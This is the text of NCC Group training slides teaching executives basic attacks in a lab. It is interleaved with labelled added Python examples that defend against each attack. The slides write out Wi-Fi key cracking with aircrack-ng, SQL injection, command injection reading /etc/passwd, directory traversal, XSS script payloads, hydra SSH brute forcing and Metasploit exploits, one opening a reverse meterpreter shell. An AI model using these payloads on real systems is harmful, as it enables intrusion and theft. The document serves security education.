ntxissacsc5 red 1 & 2 basic hacking tools ncc group

Post on 24-Jan-2018


Hacking for Executives

Basic Hacks Used by Real World Attackers

North Texas Cyber Security Conference

November 10th, 2017

Tony Cargile and Matt Nash

Agenda

• Introductions

• Session 1

  • Getting the Lab Set Up

  • Configuring our Wifi Card

  • Attacking WEP protected routers

  • Brute forcing WPA protected routers

  • Finish Up With A Q&A

• Session 2

  • Enumeration

  • Web Application Attacks

  • Brute Force Attacks

  • Accessing Backdoors

  • Exploiting Known Vulnerabilities

~ tony$ whoami

• Principal Security Consultant at NCC Group

• Austin Office

• Specializing in Application Security and Security Development LifeCycle

• National Conferences on DANE and SDLC

• Background in Development

• Bachelor of Science in Computer Science from University of Texas at Austin

• Born and raised in Fort Worth, but don’t hold that against me

~ matt$ whoami

• Security Consultant at NCC Group

• Austin Office

• Specializing in Application Security, Infrastructure Assessment, and Forensics

• Certified Digital Forensic Investigator and Incident Responder

• Background in System Administration

• Bachelor of Science in Food & Resource Economics from University of Florida

• Born and raised in Florida - sometimes referred to as Florida Man

• (only some of the news stories are true)

What is this training

• This is not a BlackHat Training

• No technical experience needed

• The purpose of this training is to teach basic attacks and tools to managers and executives in decision making roles within the security realm.

• All the tools and labs are open source and available online

The Lab

• Everyone will be constructing their own “hacker lab” within their computer.

• The Lab will consist of two virtual machines, controlled by VMware Player:

  • Kali Linux: A common attacker Linux OS

  • Metasploitable: A purposefully vulnerable Linux OS

• This course is designed for Windows, but 100% possible on Macs and Linux

The Wifi Lab

• SSID: NCC Lab 1

• WPA Password Protected

• BSSID: 00:1F:33:E5:2C:A1

• Password: ?

• SSID: NCC Lab 2

• WEP Protected

• BSSID: 68:7F:74:C4:D8:64

• Password: ?

Setting Up the Lab

Opening the USB

• 3 Files

• Kali Linux VM – 7zipped

• Metasploitable 2 VM – zipped

• VMware Player Windows Installer

VMware Install

• First, start by running the VMware installer

• Accept the EULA

• No need to install the Enhanced Keyboard Driver

• Determine whether you want to give VMware your data

• Once installed, on first run it will ask for a license

Extracting the VMs

• Extract to an easy to locate folder.

• Take note of where you extracted

• Don’t put it on the USB

Installing 7-Zip

• Right-click on the 7-Zip installer and click “Run as administrator”

• Enter administrator password and click “Yes”

• Click “Install”

• Open 7-Zip program and navigate to the folder containing the Kali archive

• Select the Kali Archive and click “Extract”

• Choose an extraction location and click “OK”

Extracting the VMs

Opening the VMs

Configuring the VMs

• This is an important step for 2 reasons:

1. We need to make sure that our VMs can talk to each other.

2. We need to make sure that we don’t expose our VMs to the world.

• Verify that the Network Adapter says “NAT”

Powering On Metasploitable

Installing VMware Tools

Logging Into Metasploitable

• Default credentials:

• Username: msfadmin

• Password: msfadmin

Logged into Metasploitable

Getting the IP Address

INPUT: ifconfig

• Note the IP Address: we will need it later!

Powering on Kali

• You will go through the same steps as when you powered on Metasploitable.

• Click “I copied it”

• Don’t change the keyboard timeout

• Install VMware tools.

Kali Starting Up

Enable Full Screen

Log into Kali

• Default credentials:

• Username: root

• Password: toor

Kali on Startup

Opening the terminal

• Unlike Windows, the task bar is on the top

• Kali now has the quick start bar on the left

• Click the black terminal icon

Getting Kali’s IP Address

INPUT: ifconfig

• Note the IP Address: we will need it later!

Wireless Attacks

Connect USB WiFi Adapter to Kali

• Plug in the provided USB wireless adapter and click the “Show devices” icon in the top-right

• Mouse over USB icon to display connected USB device

• Right-click on USB icon and click “Connect (Disconnect from host)”

Verify Kali Sees the WiFi Adapter

Check the Name of the WiFi Interface

Open a Terminal window and use `ip addr` command to list network interfaces

INPUT: ip addr

Place WiFi Interface Into Monitor Mode

Use `airmon-ng` to place wlan0 interface into “monitor” mode

INPUT: airmon-ng start wlan0

Kill Problematic Processes

Use `airmon-ng` to kill processes which may cause problems with wireless interception

INPUT: airmon-ng check kill

Searching for Nearby Access Points

Use `airodump-ng` to search for nearby wireless access points

INPUT: airodump-ng wlan0mon

Nearby Wireless Access Points

We see two interesting access points – one with WEP encryption (NCC Lab 2) and another with WPA encryption (NCC Lab 1)

Cracking WEP

Nearby Wireless Access Points

We see two interesting access points – one with WEP encryption (NCC Lab 2) and another with WPA encryption (NCC Lab 1)

Capturing Wireless Traffic

Use `airodump-ng` to capture traffic to/from the identified WEP-encrypted access point

INPUT: airodump-ng -c 6 --bssid 68:7F:74:C4:D8:64 --ivs -w Desktop/NCC-Lab-2/NCC-Lab-2_ivs wlan0mon

Capturing Wireless Traffic

Actively capturing data to/from the identified WEP-encrypted access point

Cracking the WEP Key

Using `aircrack-ng` against the captured wireless data

INPUT: aircrack-ng Desktop/NCC-Lab-2/NCC-Lab-2_ivs-01.ivs

Cracking the WEP Key

`aircrack-ng` has cracked the WEP key used to encrypt data to/from this wireless access point


Bruteforcing WPA

Nearby Wireless Access Points

We see two interesting access points – one with WEP encryption (NCC Lab 2) and another with WPA encryption (NCC Lab 1)

Capturing Wireless Traffic

Use `airodump-ng` to capture traffic to/from the identified WPA-encrypted access point

INPUT: airodump-ng -c 11 --bssid 00:1F:33:E5:2C:A1 -w Desktop/NCC-Lab-1/NCC-Lab-1 wlan0mon

Capturing Wireless Traffic

Actively capturing data to/from the identified WPA-encrypted access point

Cracking the WPA Key

Using `aircrack-ng` against the captured wireless data

INPUT: aircrack-ng -b 00:1F:33:E5:2C:A1 -w /usr/share/wordlists/rockyou.txt Desktop/NCC-Lab-1/NCC-Lab-1-01.cap

Cracking the WPA Key

`aircrack-ng` is attempting a brute force attack using the passwords in the “rockyou” wordlist

Cracking the WPA Key

`aircrack-ng` has cracked the WPA key used to encrypt data to/from this wireless access point
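Added example, not part of the NCC Group slides: the network owner's counterpart to the airodump-ng survey used in the WEP and WPA sections above. It parses a constructed survey written in the column layout airodump-ng uses for its CSV output (the column order is an assumption of this example) and flags what the two lab sections demonstrate: WEP and open networks are critical, and WPA/WPA2-PSK is only as strong as its passphrase. The two lab BSSIDs and SSIDs come from the slides; every other value in the sample (timestamps, channels, counts, the third network) is made up.

```python
import csv
import io

# Constructed survey in the column layout airodump-ng writes to <prefix>-01.csv
# (column order assumed here). Lab BSSIDs/ESSIDs are from the slides; the
# "Guest" row and all timestamps, channels and counters are invented.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:1F:33:E5:2C:A1, 2017-11-10 09:00:01, 2017-11-10 09:05:12, 11, 54, WPA2, CCMP, PSK, -41, 120, 0, 0. 0. 0. 0, 9, NCC Lab 1,
68:7F:74:C4:D8:64, 2017-11-10 09:00:03, 2017-11-10 09:05:10, 6, 54, WEP , WEP , , -47, 118, 4031, 0. 0. 0. 0, 9, NCC Lab 2,
AA:BB:CC:DD:EE:01, 2017-11-10 09:00:05, 2017-11-10 09:05:09, 1, 54, OPN , , , -70, 60, 0, 0. 0. 0. 0, 5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""


def parse_access_points(text):
    """Return one dict per row of the access-point table (stops at the station table)."""
    reader = csv.reader(io.StringIO(text), skipinitialspace=True)
    header = None
    aps = []
    for row in reader:
        cells = [c.strip() for c in row]
        if not any(cells):
            if header is not None:
                break  # the blank line separates the AP table from the station table
            continue
        if header is None:
            header = cells
            continue
        aps.append(dict(zip(header, cells)))
    return aps


def assess(ap):
    """(severity, reason) for one access point, from the network owner's point of view."""
    privacy = ap["Privacy"].upper()
    if "OPN" in privacy:
        return ("CRITICAL", "open network: traffic is not encrypted at all")
    if "WEP" in privacy:
        return ("CRITICAL", "WEP: the key is recoverable from captured IVs, retire the AP")
    if "WPA" in privacy:
        if ap["Authentication"].upper() == "PSK":
            return ("REVIEW", "WPA/WPA2-PSK: safety rests on the passphrase not being in a wordlist")
        return ("OK", "WPA/WPA2 with enterprise (802.1X) authentication")
    return ("UNKNOWN", "unrecognised privacy field: " + ap["Privacy"])


def survey_findings(text):
    """ESSID -> (severity, reason) for every access point in the survey."""
    return {ap["ESSID"]: assess(ap) for ap in parse_access_points(text)}


if __name__ == "__main__":
    for essid, (severity, reason) in survey_findings(SAMPLE_CSV).items():
        print("%-10s %-9s %s" % (essid, severity, reason))
```

Run against a real survey file the same way: read the CSV airodump-ng produced and pass its text to survey_findings; anything rated CRITICAL is an access point that the two lab sections show can be broken with stock tools.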

Web Application Attacks

Open the Web Browser

• Select the orange Firefox ESR icon

• Can also be selected by going to Applications

Browse to Metasploitable

• Input the IP Address of Metasploitable into the URL Bar

Welcome to DVWA

Turn on Easy Mode

The Reset Button

SQL Injection

• What is it?

• How prevalent is it?

• How much damage can it cause?

SQL Injection

• Error messages are great resources for Attackers!

SQL Injection

INPUT: ' or 1=1+'

SQL Injection

INPUT: ' UNION ALL SELECT user,password from users where 1=1+'
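Added example, not from the slides: the two SQL injection inputs above run against a constructed SQLite stand-in for DVWA's users table, once through a query built by string concatenation (the pattern DVWA's easy mode uses) and once through a parameterized query. The table layout and rows are invented for the demonstration. The trailing +' in each input works because, after the opening quote closes the string literal, the application's own closing quote leaves 1=1+'' in the query, and the empty string converts to 0 in arithmetic, so the comparison is still true.

```python
import sqlite3


def build_demo_db():
    """Constructed stand-in for DVWA's users table (sample rows, not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT, "
        "first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "hash-of-admin-pw", "Admin", "User"),
        (2, "gordonb", "hash-of-gordon-pw", "Gordon", "Brown"),
    ])
    return conn


def lookup_vulnerable(conn, user_id):
    """The pattern the slides exploit: the request value is pasted into the SQL text,
    so a quote in the value ends the string literal and the rest becomes SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Fixed form: the value is bound as a parameter, so quotes stay inside the value
    and the injected text is searched for as a (non-existent) user id."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    conn = build_demo_db()
    for payload in ("1", "' or 1=1+'",
                    "' UNION ALL SELECT user,password from users where 1=1+'"):
        print(repr(payload))
        print("  vulnerable   :", lookup_vulnerable(conn, payload))
        print("  parameterized:", lookup_parameterized(conn, payload))
```

The parameterized version returns nothing for both inputs because the database never sees them as SQL; that, not input filtering, is the fix the slides' question "how much damage can it cause?" should lead to.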

Command Injection

• What is it?

• How prevalent is it?

• How much damage can it cause?

• Similar to SQL Injection, but instead of injecting into a SQL database, we are injecting into a command executed by the web application server.

Command Injection

INPUT: 8.8.8.8

Command Injection

INPUT: 8.8.8.8; ls

Command Injection

INPUT: 8.8.8.8; whoami

Command Injection

INPUT: 8.8.8.8; cat /etc/passwd
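Added example, not from the slides: the ping form behind the command injection inputs above, shown as the vulnerable command string a naive page builds for a shell beside a hardened version that validates the target as an IP address and runs ping without any shell. Function names are this example's own.

```python
import ipaddress
import subprocess


def ping_command_vulnerable(host):
    """Command string a naive ping page builds and hands to a shell. With the input
    "8.8.8.8; ls" the shell runs ping and then ls: ';' is a command separator."""
    return "ping -c 1 " + host


def validate_target(host):
    """Accept only a literal IP address (IPv4 or IPv6); return it normalised, else None.
    Anything carrying a shell metacharacter fails to parse as an address."""
    try:
        return str(ipaddress.ip_address(host.strip()))
    except ValueError:
        return None


def ping_argv(host):
    """argv for subprocess with shell=False: the host is exactly one argument and is
    never interpreted by a shell, and it must pass validation first."""
    target = validate_target(host)
    if target is None:
        raise ValueError("rejected target: %r" % host)
    return ["ping", "-c", "1", target]


def run_ping(host):
    """Hardened execution: list argv, no shell, bounded run time."""
    return subprocess.run(ping_argv(host), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    for value in ("8.8.8.8", "8.8.8.8; ls", "8.8.8.8; whoami", "8.8.8.8; cat /etc/passwd"):
        print("%-28r shell string: %-40r accepted: %s"
              % (value, ping_command_vulnerable(value), validate_target(value) is not None))
```

Two layers matter here: the allow-list (only an IP address is accepted) and the list-form subprocess call (even if validation were loosened, the value arrives at ping as a single argument rather than at a shell).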

Local File Inclusion/Directory Traversal

• What is it?

• How prevalent is it?

• How much damage can it cause?

Local File Inclusion/Directory Traversal

INPUT: test.php

Local File Inclusion/Directory Traversal

INPUT: ../../phpinfo.php

Local File Inclusion/Directory Traversal

INPUT: ../../../../../../../../etc/passwd
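Added example, not from the slides: a resolver for the file parameter of an include page that lexically confines the requested name to one directory, so the ../../ inputs above are rejected while a plain file name inside the directory is served. INCLUDE_ROOT is an assumed path for this example, not DVWA's layout.

```python
import posixpath

# Assumed directory the include page is allowed to serve from (example path only).
INCLUDE_ROOT = "/var/www/app/includes"


def resolve_include(user_path, root=INCLUDE_ROOT):
    """Return the absolute path to include, or None when the request would leave root.

    The check is lexical (normpath collapses every ../ segment before the prefix
    test), which is what defeats traversal strings; on a live filesystem follow it
    with os.path.realpath so symlinks placed under root cannot point outside it.
    """
    if "\x00" in user_path:
        return None  # an embedded NUL would truncate the name in C-backed file APIs
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for value in ("test.php", "../../phpinfo.php",
                  "../../../../../../../../etc/passwd", "/etc/passwd"):
        print("%-40s -> %s" % (value, resolve_include(value)))
```

An absolute path is also rejected, because posixpath.join discards the root when the second argument starts with a slash, leaving a candidate outside root.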

Cross Site Scripting

• What is it?

• How prevalent is it?

• How much damage can it cause?

Stored Cross Site Scripting

INPUT: <img src="http://bit.ly/2dtWOWN">

Stored Cross Site Scripting

INPUT: <script>alert(document.cookie);</script>

Stored Cross Site Scripting

DON'T DO THIS: <script>document.location="https://nccgroup.trust";</script>
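Added example, not from the slides: the guestbook rendering that the stored XSS inputs above abuse, in its raw-concatenation form beside an output-encoded form, plus the Set-Cookie flags that keep the session id out of document.cookie (what the alert payload reads). Function names and the cookie value are this example's own.

```python
import html


def render_comment_vulnerable(name, message):
    """Guestbook rendering as the slides' stored XSS target does it: raw concatenation,
    so a stored <script> or <img> tag is sent to every later visitor's browser."""
    return '<div class="comment"><b>%s</b>: %s</div>' % (name, message)


def render_comment(name, message):
    """Hardened: every user-controlled value is HTML-escaped at output time, so the
    browser displays the tag text instead of executing it."""
    return '<div class="comment"><b>%s</b>: %s</div>' % (
        html.escape(name, quote=True),
        html.escape(message, quote=True),
    )


def session_cookie_header(name, value):
    """Set-Cookie line for the session id. HttpOnly keeps the value out of
    document.cookie; Secure and SameSite limit where the browser will send it."""
    return "Set-Cookie: %s=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % (name, value)


if __name__ == "__main__":
    payloads = ['<img src="http://bit.ly/2dtWOWN">',
                "<script>alert(document.cookie);</script>"]
    for p in payloads:
        print("raw     :", render_comment_vulnerable("guest", p))
        print("escaped :", render_comment("guest", p))
    print(session_cookie_header("PHPSESSID", "constructed-session-id"))
```

Escaping is applied at output, not at storage, so the same stored text is safe in every page that renders it; HttpOnly does not stop the script running, it only removes the session cookie from what injected script can read.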

Reflected Cross Site Scripting

Network Penetration Attacks

Enumeration

INPUT: nmap -sV -p- 192.168.132.128

Enumeration

Brute Forcing Passwords

INPUT: hydra -l sys -P /usr/share/john/password.lst -t 4 192.168.132.128 ssh

Brute Forcing Passwords

INPUT: ssh sys@192.168.132.128
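Added example, not from the slides: detection logic for the hydra run above, written over constructed sshd lines in auth.log syntax. It counts failed logins per source address inside a sliding window and records whether the same address later logged in successfully, which is the trace a successful brute force leaves behind. The threshold and window are assumptions to tune per environment; the addresses are the two lab VMs from the slides and the third source is made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in auth.log syntax. 192.168.132.129 (Kali) guessing "sys"
# on Metasploitable mirrors the hydra run; 192.168.132.1 is an invented admin host.
SAMPLE_AUTH_LOG = """\
Nov 10 10:15:01 metasploitable sshd[2201]: Failed password for sys from 192.168.132.129 port 40112 ssh2
Nov 10 10:15:01 metasploitable sshd[2202]: Failed password for sys from 192.168.132.129 port 40113 ssh2
Nov 10 10:15:02 metasploitable sshd[2203]: Failed password for sys from 192.168.132.129 port 40114 ssh2
Nov 10 10:15:02 metasploitable sshd[2204]: Failed password for sys from 192.168.132.129 port 40115 ssh2
Nov 10 10:15:03 metasploitable sshd[2205]: Failed password for sys from 192.168.132.129 port 40116 ssh2
Nov 10 10:15:03 metasploitable sshd[2206]: Failed password for sys from 192.168.132.129 port 40117 ssh2
Nov 10 10:15:04 metasploitable sshd[2207]: Accepted password for sys from 192.168.132.129 port 40118 ssh2
Nov 10 10:20:30 metasploitable sshd[2300]: Failed password for msfadmin from 192.168.132.1 port 51000 ssh2
Nov 10 10:20:45 metasploitable sshd[2301]: Accepted password for msfadmin from 192.168.132.1 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_sshd(text, year=2017):
    """(timestamp, result, user, source_ip) per matching line; syslog lines carry no year."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
        events.append((ts, m.group("result"), m.group("user"), m.group("ip")))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Alert on a source IP with >= threshold failures inside a sliding window, and
    record whether that IP later authenticated successfully (a guessed password)."""
    alerts = {}
    recent_failures = defaultdict(list)
    for ts, result, user, ip in sorted(events):
        if result == "Failed":
            window_start = ts - window
            recent_failures[ip] = [t for t in recent_failures[ip] if t >= window_start] + [ts]
            if len(recent_failures[ip]) >= threshold:
                alert = alerts.setdefault(ip, {"first_seen": recent_failures[ip][0],
                                               "users": set(), "success_after": False})
                alert["failures"] = len(recent_failures[ip])
                alert["users"].add(user)
        elif result == "Accepted" and ip in alerts:
            alerts[ip]["success_after"] = True
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(parse_sshd(SAMPLE_AUTH_LOG)).items():
        print(ip, alert)
```

The single admin failure never reaches the threshold, so only the Kali address is reported, and its success_after flag is the line a responder should act on: a password on that host has been guessed.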

Running Metasploit

INPUT: msfconsole

Enumeration

Loading an Exploit

INPUT: use exploit/unix/ftp/vsftpd_234_backdoor

Loading an Exploit

INPUT: show options

INPUT: set RHOST 192.168.132.128

Running an Exploit

INPUT: run

Running an Exploit

INPUT: id

INPUT: whoami

INPUT: ls

Loading an Exploit

INPUT: use exploit/unix/misc/distcc_exec

Loading an Exploit

INPUT: show options

INPUT: set RHOST 192.168.132.128

Running an Exploit

INPUT: run

INPUT: id

INPUT: ls

Exploiting Java RMI Using Meterpreter

INPUT: use exploit/multi/misc/java_rmi_server

INPUT: show options

Exploiting Java RMI Using Meterpreter

INPUT: set RHOST 192.168.132.128

INPUT: set LHOST 192.168.132.129

INPUT: set PAYLOAD java/meterpreter/reverse_tcp

INPUT: run
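Added example, not from the slides: cross-checking an nmap -sV report against the three Metasploit modules the slides run, so the exposures they rely on can be found and closed on your own hosts first. The scan text is a constructed excerpt in nmap's normal output layout for the lab target's address from the slides; the service banners are made up to resemble the Metasploitable VM and the rule table maps each service to the module named on the slides.

```python
import re

# Constructed excerpt in nmap normal output layout for the lab target. Banners are
# invented to resemble the Metasploitable VM, not copied from a real scan.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.132.128
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
1099/tcp open  java-rmi    GNU Classpath grmiregistry
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_nmap_ports(text):
    """(port, proto, state, service, version) tuples from nmap normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append((int(m.group("port")), m.group("proto"), m.group("state"),
                          m.group("service"), m.group("version").strip()))
    return ports


# Service name, optional version pattern, and the module from the slides that targets it.
EXPOSURE_RULES = [
    ("ftp", re.compile(r"vsftpd 2\.3\.4"), "exploit/unix/ftp/vsftpd_234_backdoor"),
    ("distccd", None, "exploit/unix/misc/distcc_exec"),
    ("java-rmi", None, "exploit/multi/misc/java_rmi_server"),
]


def flag_exposures(ports):
    """port -> module for every open service that matches a rule; others are left out."""
    findings = {}
    for port, proto, state, service, version in ports:
        if state != "open":
            continue
        for svc, version_re, module in EXPOSURE_RULES:
            if service == svc and (version_re is None or version_re.search(version)):
                findings[port] = module
    return findings


if __name__ == "__main__":
    for port, module in sorted(flag_exposures(parse_nmap_ports(SAMPLE_NMAP)).items()):
        print("%5d  %s" % (port, module))
```

Only the vsftpd rule is version-specific; distcc and an exposed RMI registry are flagged on sight because the slides exploit them by design rather than by a patchable bug, so the remediation is to stop exposing them.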

Q&A

Contact Us

• Mitchell Merrick

• Strategic Account Manager

• Mitchell.Merrick@nccgroup.trust

• (512) 431-6213

• Tony Cargile

• Principal Security Consultant

• Tony.Cargile@nccgroup.trust

• Matt Nash

• Security Consultant

• Matt.Nash@nccgroup.trust

• www.nccgroup.trust

• https://www.linkedin.com/company/ncc-group/

• https://twitter.com/NCCGroupplc

• https://www.facebook.com/NCCGroupplc/

• https://plus.google.com/+nccgroup


Office Locations

Europe: Manchester (Head Office), Basingstoke, Belgium, Cheltenham, Denmark, Edinburgh, Germany, Glasgow, Leatherhead, Leeds, Lithuania, London, Luxembourg, Milton Keynes, Spain, Sweden, Switzerland, The Netherlands

USA: Atlanta, GA; Austin, TX; Chicago, IL; New York, NY; San Francisco, CA; Seattle, WA; Sunnyvale, CA

Australia: Sydney

Canada: Kitchener, ON

Middle East: Dubai
